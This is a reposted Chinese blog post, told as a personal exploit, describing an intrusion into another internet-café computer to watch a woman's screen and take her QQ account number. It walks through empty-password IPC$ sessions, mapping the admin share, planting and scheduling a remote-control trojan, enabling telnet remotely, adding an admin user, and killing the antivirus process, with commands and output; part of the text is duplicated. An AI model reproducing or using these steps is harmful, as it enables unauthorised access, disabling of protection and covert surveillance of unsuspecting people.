实战经验:网吧入侵全攻略(转)
本文共 3616 字,大约阅读时间需要 12 分钟。
好久都没来网吧了,今天一朋友来找我。外面有下着雪,实在没地方玩,又给溜进了网吧…… 在以前家里没买电脑时。整天都泡这网吧,所以对他的系统设置什么还了解点,都大半年没来了……不知道有啥变化…… 这网吧还不错.别的网吧都是无盘的或者就是98的.这里98和2000都有,呵.,搞入侵可方便了…… 无意的看到13号坐着两MM,嘻.……入侵也由此开始了,看能不能拿到MM的QQ号……偶也找了一2000系统的机器做下,(偶找了一角落.呵.这样比较安全点..) 打开偶可爱的CMD..先net name下看看本机情况 WANGLU05 USER2000 命令成功完成。 我本机名是WANGLU05.ping下看看IP有无什么规则 Pinging wanglu05 [192.168.0.13] with 32 bytes of data: Reply from 192.168.0.13: bytes=32 time<10ms TTL=64 Reply from 192.168.0.13: bytes=32 time<10ms TTL=64 Reply from 192.168.0.13: bytes=32 time<10ms TTL=64 Reply from 192.168.0.13: bytes=32 time<10ms TTL=64 IP是改了.记的以前是有一种规则的.比如我5号把.内网IP就是192.168.0.5. 这次MM在13号..IP就不能猜了...不过网吧机器名可是一样的...有路了. Pinging WANGLU13 [192.168.0.225] with 32 bytes of data: Reply from 192.168.0.225: bytes=32 time<10ms TTL=128 Reply from 192.168.0.225: bytes=32 time<10ms TTL=128 Reply from 192.168.0.225: bytes=32 time<10ms TTL=128 得到内网IP是192.168.0.225...偶记的以前是存在默认共享的..这次换了网管不知道他有没做防范措施....从这入手.... net use file&://192.168.0.225/ipc$ '' /user:'' 空连接成功..说明ipc$默认共享还在... 只是没权限...网吧的登陆用户全是一样的.而且密码为空.又让我给钻了空子. G:/>net use file&://192.168.0.225/ipc$ '' /user:'user04' 命令成功完成。 
430)this.width=430" align="center" border="0" />如图1. 网吧系统盘为G盘.接着映射对方G盘为我本地Z盘. G:/>net use z: file&://192.168.0.225/g$ 命令成功完成。 
430)this.width=430" align="center" border="0" />如图2 现在我的电脑里多了一个Z盘...图3. 
430)this.width=430" align="center" border="0" />现在我们在这个Z盘里新建或删除文件.也就等于在192.168.0.225这个机器上操作了... 这些相信大家都知道的吧..我就不废话了..当然这些还不是我们想要的...要进一步控制她.然后拿到QQ号.^_^........表说我坏.... 下面来copy一个木马客户端上去先...由于只是看QQ而已...所以我找了一个 web控制台.体积没多大,205KB..下面是关于webserver的介绍./../ web控制台 一个直接在IE栏里输入对方IP就可以控制对方机器的小软件,也就是所谓的B/S模式的控制。用起来很方便,对方运行了服务端后,你在IE栏里直接输入对方IP就可以控制了,也可以通过刷新来实现重复抓屏。 可以在我网络盘里下到 
综合工具里有个 webserver.rar 接着 G:/>copy webserver.exe file&://192.168.0.225/admin$ 已复制 1 个文件。 G:/>net time file&://192.168.0.225 file&://192.168.0.225 的当前时间是 2005/2/5 下午 05:00 命令成功完成。 
430)this.width=430" align="center" border="0" />图4 G:/>at file&://192.168.0.225 17:02 webserver.exe 用AT命令启动webserver.exe. 2分钟过后.在IE里输入192.168.0.225.就可以控制对方了...可是偶一会用net time查看时.都已经过了3分钟了.还是打不开....后来又重新来了一次.眼睛就盯着MM的屏幕看,才发现到了我指定的时间.程序执行时.被瑞星给杀了... FT....我说那. 难道就没办法了吗...当然不是...可以换个别的马或加壳.修改它特征码什么的.但在网吧工具也不是很齐全.我也懒的下.. 还好微软为我们提供了一个非常不错的系统工具....也算的上是一类控制软件了... 开控制面板--管理工具--计算机管理 操作-连接到另一计算机. 然后输入IP192.168.0.225 
430)this.width=430" align="center" border="0" />图5 呵.等一会就可以看到成功了...你看到了什么? 更爽的是我们可以远程开启他的服务...在这里启动他的telnet服务. 
430)this.width=430" align="center" border="0" />图6 OK了... 本地打开一cmd 输入 G:/>telnet 192.168.0.225 回车后出现 Server allows NTLM authentication only Server has closed connection 
430)this.width=430" align="center" border="0" />图7 需要NTML认证的...用小榕的那个ntml.exe就可以解决这一问题. ntlm.exe在《流光》的Tools目录中有的... 没工具怎么办呢.. 我们在本地添加一和远程主机同样的用户名 输入 net user user04 /add 添加user04密码为空的用户 net localgroup administrators user04 /add 把user04加入管理员组 然后来到G:/Winnt/system32下找到CMD.exe 右击.创建快捷方式.然后在快捷方式 CMD右击..属性. 在以其他用户身份运行前打勾... 
430)this.width=430" align="center" border="0" />图8 然后运行然后运行快捷方式 CMD 弹出窗口.在用户名处输入user04密码为空 
430)this.width=430" align="center" border="0" />图9 然后 telnet 192.168.0.225 回车..哈哈...拿到shell了.... 接下来的事就好办了...去黑基down了一个knlps 命令行下杀进程的东东 copy上去././然后telnet上去.在CMD下执行...杀掉了瑞星的进程 这下把瑞星给关了.还怕他提示有毒 接着执行webserver.exe 在IE里输入 192.168.0.225 
430)this.width=430" align="center" border="0" />图10 看到了.挖卡卡..开心...点那个查看屏幕..呵..MM正在聊天... 好了她的QQ号码也拿到手了..加了她去聊聊去....
430)this.width=430" align="center" border="0" />如图1. 网吧系统盘为G盘.接着映射对方G盘为我本地Z盘. G:/>net use z: file&://192.168.0.225/g$ 命令成功完成。 430)this.width=430" align="center" border="0" />如图2 现在我的电脑里多了一个Z盘...图3. 430)this.width=430" align="center" border="0" />现在我们在这个Z盘里新建或删除文件.也就等于在192.168.0.225这个机器上操作了... 这些相信大家都知道的吧..我就不废话了..当然这些还不是我们想要的...要进一步控制她.然后拿到QQ号.^_^........表说我坏.... 下面来copy一个木马客户端上去先...由于只是看QQ而已...所以我找了一个 web控制台.体积没多大,205KB..下面是关于webserver的介绍./../ web控制台 一个直接在IE栏里输入对方IP就可以控制对方机器的小软件,也就是所谓的B/S模式的控制。用起来很方便,对方运行了服务端后,你在IE栏里直接输入对方IP就可以控制了,也可以通过刷新来实现重复抓屏。 可以在我网络盘里下到 综合工具里有个 webserver.rar 接着 G:/>copy webserver.exe file&://192.168.0.225/admin$ 已复制 1 个文件。 G:/>net time file&://192.168.0.225 file&://192.168.0.225 的当前时间是 2005/2/5 下午 05:00 命令成功完成。 430)this.width=430" align="center" border="0" />图4 G:/>at file&://192.168.0.225 17:02 webserver.exe 用AT命令启动webserver.exe. 2分钟过后.在IE里输入192.168.0.225.就可以控制对方了...可是偶一会用net time查看时.都已经过了3分钟了.还是打不开....后来又重新来了一次.眼睛就盯着MM的屏幕看,才发现到了我指定的时间.程序执行时.被瑞星给杀了... FT....我说那. 难道就没办法了吗...当然不是...可以换个别的马或加壳.修改它特征码什么的.但在网吧工具也不是很齐全.我也懒的下.. 还好微软为我们提供了一个非常不错的系统工具....也算的上是一类控制软件了... 开控制面板--管理工具--计算机管理 操作-连接到另一计算机. 然后输入IP192.168.0.225 430)this.width=430" align="center" border="0" />图5 呵.等一会就可以看到成功了...你看到了什么? 更爽的是我们可以远程开启他的服务...在这里启动他的telnet服务. 430)this.width=430" align="center" border="0" />图6 OK了... 本地打开一cmd 输入 G:/>telnet 192.168.0.225 回车后出现 Server allows NTLM authentication only Server has closed connection 430)this.width=430" align="center" border="0" />图7 需要NTML认证的...用小榕的那个ntml.exe就可以解决这一问题. ntlm.exe在《流光》的Tools目录中有的... 没工具怎么办呢.. 我们在本地添加一和远程主机同样的用户名 输入 net user user04 /add 添加user04密码为空的用户 net localgroup administrators user04 /add 把user04加入管理员组 然后来到G:/Winnt/system32下找到CMD.exe 右击.创建快捷方式.然后在快捷方式 CMD右击..属性. 在以其他用户身份运行前打勾... 430)this.width=430" align="center" border="0" />图8 然后运行然后运行快捷方式 CMD 弹出窗口.在用户名处输入user04密码为空 430)this.width=430" align="center" border="0" />图9 然后 telnet 192.168.0.225 回车..哈哈...拿到shell了.... 接下来的事就好办了...去黑基down了一个knlps 命令行下杀进程的东东 copy上去././然后telnet上去.在CMD下执行...杀掉了瑞星的进程 这下把瑞星给关了.还怕他提示有毒 接着执行webserver.exe 在IE里输入 192.168.0.225 430)this.width=430" align="center" border="0" />图10 看到了.挖卡卡..开心...点那个查看屏幕..呵..MM正在聊天... 好了她的QQ号码也拿到手了..加了她去聊聊去.... 来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/10294527/viewspace-125066/,如需转载,请注明出处,否则将追究法律责任。
转载于:http://blog.itpub.net/10294527/viewspace-125066/
你可能感兴趣的文章
Excel 如何制作时间轴
查看>>
股票网格交易策略
查看>>
matplotlib绘图跳过时间段的处理方案
查看>>
vnpy学习_04回测评价指标的缺陷
查看>>
ubuntu终端一次多条命令方法和区别
查看>>
python之偏函数
查看>>
vnpy学习_06回测结果可视化改进
查看>>
读书笔记_量化交易如何建立自己的算法交易01
查看>>
设计模式03_工厂
查看>>
设计模式04_抽象工厂
查看>>
设计模式05_单例
查看>>
设计模式06_原型
查看>>
设计模式07_建造者
查看>>
设计模式08_适配器
查看>>
设计模式09_代理模式
查看>>
设计模式10_桥接
查看>>
设计模式11_装饰器
查看>>
设计模式12_外观模式
查看>>
设计模式13_享元模式
查看>>
设计模式14_组合结构
查看>>